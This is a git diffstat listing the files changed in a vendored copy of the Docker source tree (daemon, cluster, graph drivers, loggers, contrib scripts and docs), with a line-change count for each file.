.../docker/cmd/dockerd/config_common_unix.go | 34 + .../docker/docker/cmd/dockerd/config_unix.go | 50 + 
.../docker/cmd/dockerd/config_unix_test.go | 23 + .../docker/cmd/dockerd/config_windows.go | 26 + .../docker/docker/cmd/dockerd/daemon.go | 590 +- .../docker/cmd/dockerd/daemon_freebsd.go | 4 + .../docker/docker/cmd/dockerd/daemon_linux.go | 8 +- .../docker/cmd/dockerd/daemon_solaris.go | 85 - .../docker/docker/cmd/dockerd/daemon_test.go | 149 +- .../docker/docker/cmd/dockerd/daemon_unix.go | 76 +- .../docker/cmd/dockerd/daemon_unix_test.go | 95 +- .../docker/cmd/dockerd/daemon_windows.go | 47 +- .../docker/docker/cmd/dockerd/docker.go | 77 +- .../docker/docker/cmd/dockerd/docker_unix.go | 8 + .../docker/cmd/dockerd/docker_windows.go | 36 +- .../dockerd/hack/malformed_host_override.go | 4 +- .../hack/malformed_host_override_test.go | 2 +- .../docker/docker/cmd/dockerd/metrics.go | 4 +- .../common.go => cmd/dockerd/options.go} | 76 +- .../docker/docker/cmd/dockerd/options_test.go | 44 + .../docker/cmd/dockerd/service_unsupported.go | 4 - .../docker/cmd/dockerd/service_windows.go | 50 +- vendor/github.com/docker/docker/codecov.yml | 17 + .../docker/docker/container/archive.go | 32 +- .../docker/docker/container/container.go | 859 +-- .../docker/container/container_linux.go | 9 - .../docker/container/container_notlinux.go | 23 - .../docker/container/container_unit_test.go | 96 +- .../docker/docker/container/container_unix.go | 337 +- .../docker/container/container_windows.go | 200 +- .../github.com/docker/docker/container/env.go | 43 + .../utils_test.go => container/env_test.go} | 9 +- .../docker/docker/container/health.go | 55 +- .../docker/docker/container/history.go | 2 +- .../docker/docker/container/memory_store.go | 2 +- .../docker/container/memory_store_test.go | 6 +- .../docker/docker/container/monitor.go | 4 +- .../docker/docker/container/mounts_unix.go | 2 +- .../docker/docker/container/mounts_windows.go | 2 +- .../docker/docker/container/state.go | 256 +- .../docker/docker/container/state_solaris.go | 7 - .../docker/docker/container/state_test.go | 155 +- 
.../docker/docker/container/state_unix.go | 10 - .../docker/docker/container/state_windows.go | 7 - .../docker/docker/container/store.go | 2 +- .../docker/docker/container/stream/attach.go | 175 + .../docker/docker/container/stream/streams.go | 17 +- .../docker/docker/container/view.go | 494 ++ .../docker/docker/container/view_test.go | 186 + .../contrib/builder/deb/aarch64/build.sh | 10 - .../contrib/builder/deb/aarch64/generate.sh | 118 - .../deb/aarch64/ubuntu-trusty/Dockerfile | 24 - .../deb/aarch64/ubuntu-xenial/Dockerfile | 22 - .../contrib/builder/deb/amd64/README.md | 5 - .../docker/contrib/builder/deb/amd64/build.sh | 10 - .../deb/amd64/debian-jessie/Dockerfile | 20 - .../deb/amd64/debian-stretch/Dockerfile | 20 - .../deb/amd64/debian-wheezy/Dockerfile | 22 - .../contrib/builder/deb/amd64/generate.sh | 149 - .../deb/amd64/ubuntu-precise/Dockerfile | 16 - .../deb/amd64/ubuntu-trusty/Dockerfile | 16 - .../deb/amd64/ubuntu-xenial/Dockerfile | 16 - .../deb/amd64/ubuntu-yakkety/Dockerfile | 16 - .../deb/armhf/debian-jessie/Dockerfile | 20 - .../contrib/builder/deb/armhf/generate.sh | 158 - .../deb/armhf/raspbian-jessie/Dockerfile | 22 - .../deb/armhf/ubuntu-trusty/Dockerfile | 16 - .../deb/armhf/ubuntu-xenial/Dockerfile | 16 - .../deb/armhf/ubuntu-yakkety/Dockerfile | 16 - .../contrib/builder/deb/ppc64le/build.sh | 10 - .../contrib/builder/deb/ppc64le/generate.sh | 103 - .../deb/ppc64le/ubuntu-trusty/Dockerfile | 16 - .../deb/ppc64le/ubuntu-xenial/Dockerfile | 16 - .../deb/ppc64le/ubuntu-yakkety/Dockerfile | 16 - .../docker/contrib/builder/deb/s390x/build.sh | 10 - .../contrib/builder/deb/s390x/generate.sh | 96 - .../deb/s390x/ubuntu-xenial/Dockerfile | 16 - .../contrib/builder/rpm/amd64/README.md | 5 - .../docker/contrib/builder/rpm/amd64/build.sh | 10 - .../builder/rpm/amd64/centos-7/Dockerfile | 19 - .../builder/rpm/amd64/fedora-24/Dockerfile | 19 - .../builder/rpm/amd64/fedora-25/Dockerfile | 19 - .../contrib/builder/rpm/amd64/generate.sh | 189 - 
.../rpm/amd64/opensuse-13.2/Dockerfile | 18 - .../rpm/amd64/oraclelinux-6/Dockerfile | 28 - .../rpm/amd64/oraclelinux-7/Dockerfile | 18 - .../builder/rpm/amd64/photon-1.0/Dockerfile | 18 - .../docker/docker/contrib/check-config.sh | 10 +- .../docker/contrib/completion/REVIEWERS | 2 - .../docker/contrib/completion/bash/docker | 4282 ------------ .../contrib/completion/fish/docker.fish | 405 -- .../contrib/completion/powershell/readme.txt | 1 - .../docker/contrib/completion/zsh/REVIEWERS | 2 - .../docker/contrib/completion/zsh/_docker | 2787 -------- .../desktop-integration/chromium/Dockerfile | 2 +- .../desktop-integration/gparted/Dockerfile | 2 +- .../contrib/docker-device-tool/device_tool.go | 15 +- .../contrib/docker-machine-install-bundle.sh | 111 + .../contrib/download-frozen-image-v1.sh | 2 +- .../contrib/download-frozen-image-v2.sh | 308 +- .../docker/docker/contrib/gitdm/domain-map | 10 +- .../docker/contrib/gitdm/generate_aliases.sh | 2 +- .../contrib/httpserver/Dockerfile.solaris | 4 - .../docker/contrib/init/openrc/docker.confd | 10 + .../docker/contrib/init/openrc/docker.initd | 4 +- .../contrib/init/systemd/docker.service | 7 +- .../contrib/init/systemd/docker.service.rpm | 7 +- .../contrib/init/sysvinit-debian/docker | 10 +- .../docker/docker/contrib/mkimage-alpine.sh | 13 +- .../docker/docker/contrib/mkimage-busybox.sh | 43 - .../docker/contrib/mkimage-debootstrap.sh | 297 - .../docker/docker/contrib/mkimage-rinse.sh | 123 - .../docker/docker/contrib/mkimage-yum.sh | 4 +- .../docker/docker/contrib/mkimage.sh | 8 - .../docker/docker/contrib/mkimage/debootstrap | 29 +- .../docker/docker/contrib/mkimage/solaris | 89 - .../docker/contrib/nuke-graph-directory.sh | 2 +- .../docker/docker/contrib/project-stats.sh | 22 - .../docker/docker/contrib/reprepro/suites.sh | 12 - .../docker-engine-selinux/LICENSE | 339 - .../docker-engine-selinux/Makefile | 23 - .../docker-engine-selinux/README.md | 1 - .../docker-engine-selinux/docker.fc | 29 - 
.../docker-engine-selinux/docker.if | 523 -- .../docker-engine-selinux/docker.te | 399 -- .../docker-engine-selinux/LICENSE | 339 - .../docker-engine-selinux/Makefile | 23 - .../docker-engine-selinux/README.md | 1 - .../docker-engine-selinux/docker.fc | 33 - .../docker-engine-selinux/docker.if | 659 -- .../docker-engine-selinux/docker.te | 465 -- .../selinux/docker-engine-selinux/LICENSE | 340 - .../selinux/docker-engine-selinux/Makefile | 16 - .../selinux/docker-engine-selinux/docker.fc | 18 - .../selinux/docker-engine-selinux/docker.if | 461 -- .../selinux/docker-engine-selinux/docker.te | 407 -- .../docker-engine-selinux/docker_selinux.8.gz | Bin 2847 -> 0 bytes .../Syntaxes/Dockerfile.tmLanguage | 21 +- .../syntax/vim/ftdetect/dockerfile.vim | 2 +- .../docker/docker/contrib/syscall-test/ns.c | 2 +- .../docker/contrib/syscall-test/userns.c | 2 +- .../docker/contrib/vagrant-docker/README.md | 4 +- .../docker/docker/daemon/apparmor_default.go | 4 +- .../daemon/apparmor_default_unsupported.go | 2 +- .../docker/docker/daemon/archive.go | 273 +- .../docker/daemon/archive_tarcopyoptions.go | 15 + .../daemon/archive_tarcopyoptions_unix.go | 25 + .../daemon/archive_tarcopyoptions_windows.go | 10 + .../docker/docker/daemon/archive_unix.go | 43 +- .../docker/docker/daemon/archive_windows.go | 29 +- .../github.com/docker/docker/daemon/attach.go | 154 +- .../github.com/docker/docker/daemon/auth.go | 4 +- .../docker/docker/daemon/bindmount_solaris.go | 5 - .../docker/docker/daemon/bindmount_unix.go | 2 +- .../daemon/caps/{utils_unix.go => utils.go} | 28 +- .../docker/docker/daemon/changes.go | 5 +- .../docker/docker/daemon/checkpoint.go | 79 +- .../docker/docker/daemon/cluster.go | 16 +- .../docker/docker/daemon/cluster/cluster.go | 1959 +----- .../docker/docker/daemon/cluster/configs.go | 118 + .../cluster/controllers/plugin/controller.go | 261 + .../controllers/plugin/controller_test.go | 390 ++ .../docker/daemon/cluster/convert/config.go | 78 + 
.../daemon/cluster/convert/container.go | 255 +- .../docker/daemon/cluster/convert/network.go | 86 +- .../daemon/cluster/convert/network_test.go | 34 + .../docker/daemon/cluster/convert/node.go | 21 +- .../docker/daemon/cluster/convert/secret.go | 38 +- .../docker/daemon/cluster/convert/service.go | 445 +- .../daemon/cluster/convert/service_test.go | 308 + .../docker/daemon/cluster/convert/swarm.go | 47 +- .../docker/daemon/cluster/convert/task.go | 62 +- .../docker/docker/daemon/cluster/errors.go | 61 + .../docker/daemon/cluster/executor/backend.go | 38 +- .../cluster/executor/container/adapter.go | 144 +- .../cluster/executor/container/attachment.go | 21 +- .../cluster/executor/container/container.go | 198 +- .../executor/container/container_test.go | 37 + .../cluster/executor/container/controller.go | 188 +- .../cluster/executor/container/errors.go | 12 +- .../cluster/executor/container/executor.go | 155 +- .../cluster/executor/container/health_test.go | 22 +- .../cluster/executor/container/validate.go | 5 +- .../executor/container/validate_test.go | 7 +- .../executor/container/validate_unix_test.go | 2 +- .../container/validate_windows_test.go | 2 +- .../docker/docker/daemon/cluster/filters.go | 41 +- .../docker/daemon/cluster/filters_test.go | 102 + .../docker/docker/daemon/cluster/helpers.go | 260 +- .../docker/daemon/cluster/listen_addr.go | 125 +- .../daemon/cluster/listen_addr_linux.go | 4 +- .../daemon/cluster/listen_addr_others.go | 4 +- .../daemon/cluster/listen_addr_solaris.go | 57 - .../docker/docker/daemon/cluster/networks.go | 316 + .../docker/daemon/cluster/noderunner.go | 388 ++ .../docker/docker/daemon/cluster/nodes.go | 105 + .../docker/daemon/cluster/provider/network.go | 2 +- .../docker/docker/daemon/cluster/secrets.go | 147 +- .../docker/docker/daemon/cluster/services.go | 602 ++ .../docker/docker/daemon/cluster/swarm.go | 569 ++ .../docker/docker/daemon/cluster/tasks.go | 87 + .../docker/docker/daemon/cluster/utils.go | 63 + 
.../github.com/docker/docker/daemon/commit.go | 165 +- .../docker/daemon/{ => config}/config.go | 296 +- .../daemon/config/config_common_unix.go | 71 + .../daemon/config/config_common_unix_test.go | 84 + .../docker/daemon/config/config_test.go | 518 ++ .../docker/daemon/config/config_unix.go | 87 + .../docker/daemon/config/config_unix_test.go | 134 + .../docker/daemon/config/config_windows.go | 57 + .../daemon/config/config_windows_test.go | 60 + .../docker/docker/daemon/config/opts.go | 22 + .../docker/daemon/config_common_unix.go | 90 - .../docker/daemon/config_experimental.go | 8 - .../docker/docker/daemon/config_solaris.go | 47 - .../docker/docker/daemon/config_test.go | 229 - .../docker/docker/daemon/config_unix.go | 104 - .../docker/docker/daemon/config_unix_test.go | 80 - .../docker/docker/daemon/config_windows.go | 71 - .../docker/daemon/config_windows_test.go | 59 - .../docker/docker/daemon/configs.go | 21 + .../docker/docker/daemon/configs_linux.go | 5 + .../docker/daemon/configs_unsupported.go | 7 + .../docker/docker/daemon/configs_windows.go | 5 + .../docker/docker/daemon/container.go | 144 +- .../docker/docker/daemon/container_linux.go | 30 + .../docker/daemon/container_operations.go | 243 +- .../daemon/container_operations_solaris.go | 46 - .../daemon/container_operations_unix.go | 288 +- .../daemon/container_operations_windows.go | 160 +- .../docker/daemon/container_unix_test.go | 44 + .../docker/docker/daemon/container_windows.go | 9 + .../github.com/docker/docker/daemon/create.go | 194 +- .../docker/docker/daemon/create_test.go | 21 + .../docker/docker/daemon/create_unix.go | 33 +- .../docker/docker/daemon/create_windows.go | 35 +- .../github.com/docker/docker/daemon/daemon.go | 1105 ++- .../docker/daemon/daemon_experimental.go | 7 - .../docker/docker/daemon/daemon_linux.go | 61 +- .../docker/docker/daemon/daemon_linux_test.go | 226 +- .../docker/docker/daemon/daemon_solaris.go | 523 -- .../docker/docker/daemon/daemon_test.go | 394 +- 
.../docker/docker/daemon/daemon_unix.go | 714 +- .../docker/docker/daemon/daemon_unix_test.go | 167 +- .../docker/daemon/daemon_unsupported.go | 4 +- .../docker/docker/daemon/daemon_windows.go | 277 +- .../docker/daemon/daemon_windows_test.go | 72 + .../docker/docker/daemon/debugtrap.go | 62 - .../docker/docker/daemon/debugtrap_unix.go | 14 +- .../docker/daemon/debugtrap_unsupported.go | 4 +- .../docker/docker/daemon/debugtrap_windows.go | 28 +- .../github.com/docker/docker/daemon/delete.go | 106 +- .../docker/docker/daemon/delete_test.go | 92 +- .../docker/docker/daemon/dependency.go | 17 + .../daemon/{ => discovery}/discovery.go | 35 +- .../docker/daemon/discovery/discovery_test.go | 96 + .../docker/docker/daemon/discovery_test.go | 164 - .../docker/docker/daemon/disk_usage.go | 78 +- .../github.com/docker/docker/daemon/errors.go | 166 +- .../github.com/docker/docker/daemon/events.go | 226 +- .../docker/docker/daemon/events/events.go | 21 +- .../docker/daemon/events/events_test.go | 27 +- .../docker/docker/daemon/events/filter.go | 38 +- .../docker/docker/daemon/events/metrics.go | 2 +- .../daemon/events/testutils/testutils.go | 2 +- .../docker/docker/daemon/events_test.go | 34 +- .../github.com/docker/docker/daemon/exec.go | 152 +- .../docker/docker/daemon/exec/exec.go | 60 +- .../docker/docker/daemon/exec_linux.go | 42 +- .../docker/docker/daemon/exec_linux_test.go | 53 + .../docker/docker/daemon/exec_solaris.go | 11 - .../docker/docker/daemon/exec_windows.go | 12 +- .../github.com/docker/docker/daemon/export.go | 54 +- .../docker/docker/daemon/getsize_unix.go | 41 - .../docker/daemon/graphdriver/aufs/aufs.go | 235 +- .../daemon/graphdriver/aufs/aufs_test.go | 173 +- .../docker/daemon/graphdriver/aufs/dirs.go | 6 +- .../docker/daemon/graphdriver/aufs/mount.go | 12 +- .../daemon/graphdriver/aufs/mount_linux.go | 6 +- .../graphdriver/aufs/mount_unsupported.go | 2 +- .../docker/daemon/graphdriver/btrfs/btrfs.go | 285 +- .../daemon/graphdriver/btrfs/btrfs_test.go | 
6 +- .../graphdriver/btrfs/dummy_unsupported.go | 2 +- .../daemon/graphdriver/btrfs/version.go | 2 +- .../daemon/graphdriver/btrfs/version_none.go | 2 +- .../daemon/graphdriver/btrfs/version_test.go | 4 +- .../docker/daemon/graphdriver/copy/copy.go | 277 + .../daemon/graphdriver/copy/copy_test.go | 159 + .../docker/daemon/graphdriver/counter.go | 39 +- .../daemon/graphdriver/devmapper/README.md | 16 +- .../graphdriver/devmapper/device_setup.go | 231 + .../daemon/graphdriver/devmapper/deviceset.go | 661 +- .../graphdriver/devmapper/devmapper_doc.go | 2 +- .../graphdriver/devmapper/devmapper_test.go | 107 +- .../daemon/graphdriver/devmapper/driver.go | 121 +- .../daemon/graphdriver/devmapper/mount.go | 25 +- .../docker/daemon/graphdriver/driver.go | 81 +- .../daemon/graphdriver/driver_freebsd.go | 16 +- .../docker/daemon/graphdriver/driver_linux.go | 31 +- .../daemon/graphdriver/driver_solaris.go | 97 - .../docker/daemon/graphdriver/driver_test.go | 36 + .../daemon/graphdriver/driver_unsupported.go | 10 +- .../daemon/graphdriver/driver_windows.go | 8 +- .../docker/daemon/graphdriver/errors.go | 36 + .../docker/daemon/graphdriver/fsdiff.go | 30 +- .../graphdriver/graphtest/graphbench_unix.go | 12 +- .../graphdriver/graphtest/graphtest_unix.go | 92 +- .../graphtest/graphtest_windows.go | 2 +- .../daemon/graphdriver/graphtest/testutil.go | 91 +- .../graphdriver/graphtest/testutil_unix.go | 140 +- .../docker/daemon/graphdriver/lcow/lcow.go | 1052 +++ .../daemon/graphdriver/lcow/lcow_svm.go | 378 + .../daemon/graphdriver/lcow/remotefs.go | 139 + .../daemon/graphdriver/lcow/remotefs_file.go | 211 + .../graphdriver/lcow/remotefs_filedriver.go | 123 + .../graphdriver/lcow/remotefs_pathdriver.go | 212 + .../docker/daemon/graphdriver/overlay/copy.go | 174 - .../daemon/graphdriver/overlay/overlay.go | 192 +- .../graphdriver/overlay/overlay_test.go | 2 +- .../overlay/overlay_unsupported.go | 2 +- .../daemon/graphdriver/overlay2/check.go | 75 +- 
.../daemon/graphdriver/overlay2/mount.go | 11 +- .../daemon/graphdriver/overlay2/overlay.go | 273 +- .../graphdriver/overlay2/overlay_test.go | 14 +- .../overlay2/overlay_unsupported.go | 2 +- .../daemon/graphdriver/overlay2/randomid.go | 7 +- .../graphdriver/overlayutils/overlayutils.go | 15 +- .../docker/daemon/graphdriver/plugin.go | 40 +- .../docker/docker/daemon/graphdriver/proxy.go | 100 +- .../docker/daemon/graphdriver/quota/errors.go | 19 + .../daemon/graphdriver/quota/projectquota.go | 87 +- .../graphdriver/quota/projectquota_test.go | 152 + .../graphdriver/register/register_aufs.go | 2 +- .../graphdriver/register/register_btrfs.go | 2 +- .../register/register_devicemapper.go | 4 +- .../graphdriver/register/register_overlay.go | 3 +- .../graphdriver/register/register_overlay2.go | 8 + .../graphdriver/register/register_vfs.go | 2 +- .../graphdriver/register/register_windows.go | 5 +- .../graphdriver/register/register_zfs.go | 4 +- .../daemon/graphdriver/vfs/copy_linux.go | 7 + .../graphdriver/vfs/copy_unsupported.go | 9 + .../docker/daemon/graphdriver/vfs/driver.go | 94 +- .../daemon/graphdriver/vfs/quota_linux.go | 26 + .../graphdriver/vfs/quota_unsupported.go | 20 + .../docker/daemon/graphdriver/vfs/vfs_test.go | 6 +- .../daemon/graphdriver/windows/windows.go | 140 +- .../docker/daemon/graphdriver/zfs/zfs.go | 100 +- .../daemon/graphdriver/zfs/zfs_freebsd.go | 12 +- .../daemon/graphdriver/zfs/zfs_linux.go | 23 +- .../daemon/graphdriver/zfs/zfs_solaris.go | 59 - .../docker/daemon/graphdriver/zfs/zfs_test.go | 4 +- .../daemon/graphdriver/zfs/zfs_unsupported.go | 4 +- .../github.com/docker/docker/daemon/health.go | 98 +- .../docker/docker/daemon/health_test.go | 80 +- .../github.com/docker/docker/daemon/image.go | 76 - .../docker/docker/daemon/image_tag.go | 37 - .../docker/docker/daemon/images/cache.go | 27 + .../docker/docker/daemon/images/image.go | 64 + .../docker/daemon/images/image_builder.go | 219 + .../docker/daemon/images/image_commit.go | 127 + 
.../daemon/{ => images}/image_delete.go | 126 +- .../docker/daemon/images/image_events.go | 39 + .../daemon/{ => images}/image_exporter.go | 10 +- .../daemon/{ => images}/image_history.go | 29 +- .../{import.go => images/image_import.go} | 61 +- .../daemon/{ => images}/image_inspect.go | 52 +- .../docker/daemon/images/image_prune.go | 211 + .../docker/daemon/{ => images}/image_pull.go | 86 +- .../docker/daemon/{ => images}/image_push.go | 29 +- .../{search.go => images/image_search.go} | 33 +- .../image_search_test.go} | 17 +- .../docker/docker/daemon/images/image_tag.go | 41 + .../docker/docker/daemon/images/image_unix.go | 45 + .../docker/daemon/images/image_windows.go | 41 + .../docker/daemon/{ => images}/images.go | 99 +- .../docker/docker/daemon/images/locals.go | 32 + .../docker/docker/daemon/images/service.go | 251 + .../github.com/docker/docker/daemon/info.go | 98 +- .../docker/docker/daemon/info_unix.go | 77 +- .../docker/docker/daemon/info_unix_test.go | 53 + .../docker/docker/daemon/info_windows.go | 2 +- .../docker/daemon/initlayer/setup_solaris.go | 13 - .../docker/daemon/initlayer/setup_unix.go | 18 +- .../docker/daemon/initlayer/setup_windows.go | 9 +- .../docker/docker/daemon/inspect.go | 89 +- .../{inspect_unix.go => inspect_linux.go} | 23 +- .../docker/docker/daemon/inspect_solaris.go | 41 - .../docker/docker/daemon/inspect_test.go | 33 + .../docker/docker/daemon/inspect_windows.go | 17 +- .../github.com/docker/docker/daemon/keys.go | 2 +- .../docker/docker/daemon/keys_unsupported.go | 4 +- .../github.com/docker/docker/daemon/kill.go | 68 +- .../github.com/docker/docker/daemon/links.go | 10 +- .../docker/docker/daemon/links/links.go | 2 +- .../docker/docker/daemon/links/links_test.go | 18 +- .../docker/docker/daemon/links_linux.go | 72 - .../docker/docker/daemon/links_linux_test.go | 98 - .../docker/docker/daemon/links_notlinux.go | 10 - .../github.com/docker/docker/daemon/list.go | 441 +- .../docker/docker/daemon/list_test.go | 26 + 
.../docker/docker/daemon/list_unix.go | 6 +- .../docker/docker/daemon/list_windows.go | 4 +- .../docker/daemon/listeners/group_unix.go | 34 + .../listeners/listeners_linux.go} | 28 +- .../listeners/listeners_windows.go | 2 +- .../docker/docker/daemon/logdrivers_linux.go | 2 +- .../docker/daemon/logdrivers_windows.go | 3 +- .../docker/docker/daemon/logger/adapter.go | 139 + .../docker/daemon/logger/adapter_test.go | 216 + .../daemon/logger/awslogs/cloudwatchlogs.go | 522 +- .../logger/awslogs/cloudwatchlogs_test.go | 739 +- .../logger/awslogs/cwlogsiface_mock_test.go | 46 +- .../docker/docker/daemon/logger/copier.go | 77 +- .../docker/daemon/logger/copier_test.go | 202 +- .../daemon/logger/etwlogs/etwlogs_windows.go | 58 +- .../docker/docker/daemon/logger/factory.go | 72 +- .../docker/daemon/logger/fluentd/fluentd.go | 89 +- .../daemon/logger/gcplogs/gcplogging.go | 144 +- .../daemon/logger/gcplogs/gcplogging_linux.go | 29 + .../logger/gcplogs/gcplogging_others.go | 7 + .../docker/docker/daemon/logger/gelf/gelf.go | 147 +- .../docker/daemon/logger/gelf/gelf_test.go | 260 + .../daemon/logger/gelf/gelf_unsupported.go | 3 - .../docker/daemon/logger/journald/journald.go | 43 +- .../daemon/logger/journald/journald_test.go | 2 +- .../logger/journald/journald_unsupported.go | 2 +- .../docker/daemon/logger/journald/read.go | 116 +- .../daemon/logger/journald/read_native.go | 2 +- .../logger/journald/read_native_compat.go | 2 +- .../logger/journald/read_unsupported.go | 2 +- .../daemon/logger/jsonfilelog/jsonfilelog.go | 112 +- .../logger/jsonfilelog/jsonfilelog_test.go | 222 +- .../logger/jsonfilelog/jsonlog/jsonlog.go | 25 + .../jsonfilelog}/jsonlog/jsonlogbytes.go | 31 +- .../jsonfilelog/jsonlog/jsonlogbytes_test.go | 51 + .../jsonfilelog/jsonlog/time_marshalling.go | 20 + .../jsonlog/time_marshalling_test.go | 34 + .../docker/daemon/logger/jsonfilelog/read.go | 316 +- .../daemon/logger/jsonfilelog/read_test.go | 64 + .../daemon/logger/logentries/logentries.go | 61 +- 
.../docker/docker/daemon/logger/logger.go | 119 +- .../docker/daemon/logger/logger_test.go | 29 +- .../daemon/logger/loggerutils/log_tag.go | 10 +- .../daemon/logger/loggerutils/log_tag_test.go | 20 +- .../daemon/logger/loggerutils/logfile.go | 666 ++ .../loggerutils/multireader}/multireader.go | 29 +- .../multireader}/multireader_test.go | 20 +- .../logger/loggerutils/rotatefilewriter.go | 124 - .../daemon/logger/{context.go => loginfo.go} | 78 +- .../docker/docker/daemon/logger/metrics.go | 21 + .../docker/docker/daemon/logger/plugin.go | 116 + .../docker/daemon/logger/plugin_unix.go | 23 + .../daemon/logger/plugin_unsupported.go | 12 + .../docker/docker/daemon/logger/proxy.go | 107 + .../docker/docker/daemon/logger/ring.go | 223 + .../docker/docker/daemon/logger/ring_test.go | 299 + .../docker/daemon/logger/splunk/splunk.go | 114 +- .../daemon/logger/splunk/splunk_test.go | 251 +- .../logger/splunk/splunkhecmock_test.go | 29 +- .../docker/daemon/logger/syslog/syslog.go | 32 +- .../daemon/logger/syslog/syslog_test.go | 2 +- .../daemon/logger/templates/templates.go | 50 + .../daemon/logger/templates/templates_test.go | 19 + .../github.com/docker/docker/daemon/logs.go | 209 +- .../docker/docker/daemon/logs_test.go | 2 +- .../docker/docker/daemon/metrics.go | 166 +- .../docker/docker/daemon/metrics_unix.go | 60 + .../docker/daemon/metrics_unsupported.go | 12 + .../docker/docker/daemon/monitor.go | 250 +- .../docker/docker/daemon/monitor_linux.go | 19 - .../docker/docker/daemon/monitor_solaris.go | 18 - .../docker/docker/daemon/monitor_windows.go | 46 - .../github.com/docker/docker/daemon/mounts.go | 45 +- .../github.com/docker/docker/daemon/names.go | 39 +- .../docker/{utils => daemon/names}/names.go | 2 +- .../docker/docker/daemon/network.go | 698 +- .../docker/docker/daemon/network/settings.go | 38 +- vendor/github.com/docker/docker/daemon/oci.go | 78 + .../docker/docker/daemon/oci_linux.go | 415 +- .../docker/docker/daemon/oci_linux_test.go | 102 + 
.../docker/docker/daemon/oci_solaris.go | 188 - .../docker/docker/daemon/oci_windows.go | 359 +- .../github.com/docker/docker/daemon/pause.go | 26 +- .../github.com/docker/docker/daemon/prune.go | 344 +- .../github.com/docker/docker/daemon/reload.go | 324 + .../docker/docker/daemon/reload_test.go | 573 ++ .../docker/docker/daemon/reload_unix.go | 56 + .../docker/docker/daemon/reload_windows.go | 9 + .../github.com/docker/docker/daemon/rename.go | 35 +- .../github.com/docker/docker/daemon/resize.go | 18 +- .../docker/docker/daemon/resize_test.go | 103 + .../docker/docker/daemon/restart.go | 6 +- .../docker/docker/daemon/seccomp_disabled.go | 2 +- .../docker/docker/daemon/seccomp_linux.go | 6 +- .../docker/daemon/seccomp_unsupported.go | 2 +- .../docker/docker/daemon/secrets.go | 17 +- .../docker/docker/daemon/secrets_linux.go | 4 +- .../docker/daemon/secrets_unsupported.go | 4 +- .../docker/docker/daemon/secrets_windows.go | 5 + .../docker/docker/daemon/selinux_linux.go | 10 +- .../docker/daemon/selinux_unsupported.go | 2 +- .../github.com/docker/docker/daemon/start.go | 164 +- .../docker/docker/daemon/start_unix.go | 50 +- .../docker/docker/daemon/start_windows.go | 217 +- .../github.com/docker/docker/daemon/stats.go | 17 +- .../docker/docker/daemon/stats/collector.go | 159 + .../collector_unix.go} | 32 +- .../docker/daemon/stats/collector_windows.go | 17 + .../docker/docker/daemon/stats_collector.go | 132 +- .../docker/daemon/stats_collector_solaris.go | 34 - .../docker/daemon/stats_collector_windows.go | 15 - .../docker/docker/daemon/stats_unix.go | 7 +- .../docker/docker/daemon/stats_windows.go | 2 +- .../github.com/docker/docker/daemon/stop.go | 68 +- .../{api/fixtures => daemon/testdata}/keyfile | 0 .../docker/docker/daemon/top_unix.go | 101 +- .../docker/docker/daemon/top_unix_test.go | 15 +- .../docker/docker/daemon/top_windows.go | 20 +- .../docker/docker/daemon/trustkey.go | 57 + .../docker/docker/daemon/trustkey_test.go | 71 + 
.../docker/docker/daemon/unpause.go | 22 +- .../github.com/docker/docker/daemon/update.go | 45 +- .../docker/docker/daemon/update_linux.go | 59 +- .../docker/docker/daemon/update_solaris.go | 11 - .../docker/docker/daemon/update_windows.go | 10 +- .../docker/docker/daemon/util_test.go | 65 + .../docker/docker/daemon/volumes.go | 334 +- .../docker/docker/daemon/volumes_linux.go | 36 + .../docker/daemon/volumes_linux_test.go | 56 + .../docker/docker/daemon/volumes_unit_test.go | 9 +- .../docker/docker/daemon/volumes_unix.go | 111 +- .../docker/docker/daemon/volumes_unix_test.go | 256 + .../docker/docker/daemon/volumes_windows.go | 20 +- .../github.com/docker/docker/daemon/wait.go | 37 +- .../docker/docker/daemon/workdir.go | 7 +- .../docker/docker/distribution/config.go | 56 +- .../docker/docker/distribution/errors.go | 93 +- .../docker/docker/distribution/errors_test.go | 85 + .../docker/distribution/metadata/metadata.go | 2 +- .../distribution/metadata/v1_id_service.go | 2 +- .../metadata/v1_id_service_test.go | 7 +- .../metadata/v2_metadata_service.go | 10 +- .../metadata/v2_metadata_service_test.go | 4 +- .../docker/docker/distribution/pull.go | 50 +- .../docker/docker/distribution/pull_v1.go | 57 +- .../docker/docker/distribution/pull_v2.go | 279 +- .../docker/distribution/pull_v2_test.go | 15 +- .../docker/distribution/pull_v2_unix.go | 25 +- .../docker/distribution/pull_v2_windows.go | 103 +- .../docker/docker/distribution/push.go | 24 +- .../docker/docker/distribution/push_v1.go | 58 +- .../docker/docker/distribution/push_v2.go | 146 +- .../docker/distribution/push_v2_test.go | 219 +- .../docker/docker/distribution/registry.go | 16 +- .../docker/distribution/registry_unit_test.go | 24 +- .../docker/distribution/utils/progress.go | 6 +- .../docker/distribution/xfer/download.go | 70 +- .../docker/distribution/xfer/download_test.go | 24 +- .../docker/distribution/xfer/transfer.go | 6 +- .../docker/distribution/xfer/transfer_test.go | 2 +- 
.../docker/docker/distribution/xfer/upload.go | 24 +- .../docker/distribution/xfer/upload_test.go | 8 +- .../docker/docker/dockerversion/useragent.go | 16 +- .../docker/dockerversion/version_lib.go | 17 +- .../github.com/docker/docker/docs/README.md | 30 - .../docker/docker/docs/api/v1.18.md | 39 +- .../docker/docker/docs/api/v1.19.md | 39 +- .../docker/docker/docs/api/v1.20.md | 37 +- .../docker/docker/docs/api/v1.21.md | 60 +- .../docker/docker/docs/api/v1.22.md | 62 +- .../docker/docker/docs/api/v1.23.md | 73 +- .../docker/docker/docs/api/v1.24.md | 105 +- .../docker/docker/docs/api/version-history.md | 179 +- .../docker/docker/docs/contributing/README.md | 8 + .../docs/contributing/images/branch-sig.png | Bin 0 -> 56537 bytes .../contributing/images/contributor-edit.png | Bin 0 -> 17933 bytes .../docs/contributing/images/copy_url.png | Bin 0 -> 69486 bytes .../docs/contributing/images/fork_docker.png | Bin 0 -> 52190 bytes .../docs/contributing/images/git_bash.png | Bin 0 -> 26097 bytes .../docs/contributing/images/list_example.png | Bin 0 -> 51194 bytes .../docs/contributing/set-up-dev-env.md | 372 + .../docker/docs/contributing/set-up-git.md | 280 + .../docs/contributing/software-req-win.md | 177 + .../docs/contributing/software-required.md | 94 + .../docker/docker/docs/contributing/test.md | 244 + .../docs/contributing/who-written-for.md | 49 + .../docker/docker/docs/deprecated.md | 286 - .../docker/docker/docs/extend/EBS_volume.md | 164 - .../docker/docker/docs/extend/config.md | 225 - .../extend/images/authz_additional_info.png | Bin 45916 -> 0 bytes .../docker/docs/extend/images/authz_allow.png | Bin 33505 -> 0 bytes 